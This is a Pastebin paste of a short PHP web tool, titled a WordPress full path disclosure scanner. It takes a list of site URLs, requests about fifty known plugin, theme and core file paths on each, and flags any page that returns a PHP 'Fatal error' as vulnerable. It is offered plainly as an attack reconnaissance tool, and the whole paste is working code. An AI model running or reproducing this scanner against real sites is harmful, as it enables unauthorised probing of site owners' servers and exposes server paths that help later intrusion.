Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <form method="post">
- <h3> Wordpress Full Path Disclosure Scanner </h3>
- <textarea name=sites cols=35 rows=20 placeholder="put wordpress sites here"></textarea>
- <br />
- <input name=scan type=submit value=scan>
- </form>
- <?php
- if(isset($_POST['scan'])){
- $sites = explode("\n",$_POST['sites']);
- $vulns = array(
- "/wp-content/themes/dt-chocolate/index.php",
- "/wp-content/themes/massimo/sp-framework/sp-wp-login.php",
- "/wp-content/themes/eggo/sp-framework/sp-wp-login.php",
- "/wp-content/plugins/wp-codebox/wp-codebox.php?p=1&download=./",
- "/wp-content/themes/slash/index.php",
- "/wp-content/plugins/vote-it-up/voteitup.php",
- "/wp-content/plugins/wp-polls/polls-templates.php",
- "/wp-content/plugins/ultimate-security-check/wp-ultimate-security.php",
- "/wp-content/plugins/dynamic-headers/custom-header.php",
- "/wp-content/plugins/haiku-minimalist-audio-player/haiku-player.php",
- "/wp-content/plugins/wp-newsletter-simples/tl-newslleter.php",
- "/wp-content/plugins/wp-events/wp-events.php",
- "/wp-content/plugins/wp-super-cache/wp-cache.php",
- "/wp-content/plugins/admin-menu-editor/menu-editor.php",
- "/wp-content/plugins/wp-photo-album/wppa.php",
- "/wp-content/plugins/wordpress-multibox-plugin/multibox.php",
- "/wp-content/plugins/superslider-show/superslider-show.php",
- "/wp-content/themes/sahifa/category.php",
- "/wp-content/themes/moneymasters/index.php",
- "/wp-content/plugins/sitepress-multilingual-cms/sitepress.php",
- "/wp-content/themes/display/framework/includes/timthumb.php?src=/wp-content/uploads/",
- "/wp-settings.php",
- "/wp-includes/admin-bar.php",
- "/wp-includes/author-template.php",
- "/wp-includes/canonical.php",
- "/wp-includes/category-template.php",
- "/wp-includes/class-wp-embed.php",
- "/wp-includes/media.php",
- "/wp-includes/ms-default-constants.php",
- "/wp-includes/ms-default-filters.php",
- "/wp-includes/ms-settings.php",
- "/wp-includes/post.php",
- "/wp-includes/rss.php",
- "/wp-includes/user.php",
- "/wp-includes/theme.php",
- "/wp-includes/vars.php",
- "/wp-includes/class-wp-http-ixr-client.php",
- "/wp-includes/class-wp-image-editor-gd.php",
- "/wp-includes/class-wp-image-editor-imagick.php",
- "/wp-includes/class-wp-xmlrpc-server.php",
- "/wp-includes/class.wp-scripts.php",
- "/wp-includes/class.wp-styles.php",
- "/wp-includes/comment-template.php",
- "/wp-includes/default-filters.php",
- "/wp-includes/default-widgets.php",
- "/wp-includes/feed-atom-comments.php",
- "/wp-includes/feed-atom.php",
- "/wp-includes/feed-rdf.php",
- "/wp-includes/feed-rss.php",
- "/wp-includes/feed-rss2-comments.php",
- "/wp-includes/feed-rss2.php",
- "/wp-includes/functions.php"
- );
- foreach($sites as $site){
- foreach($vulns as $vuln){
- if (preg_match("/Fatal error/",@file_get_contents("$site$vuln"))){
- echo "<hr>";
- echo "vuln : $site$vuln <br />";
- }
- }
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement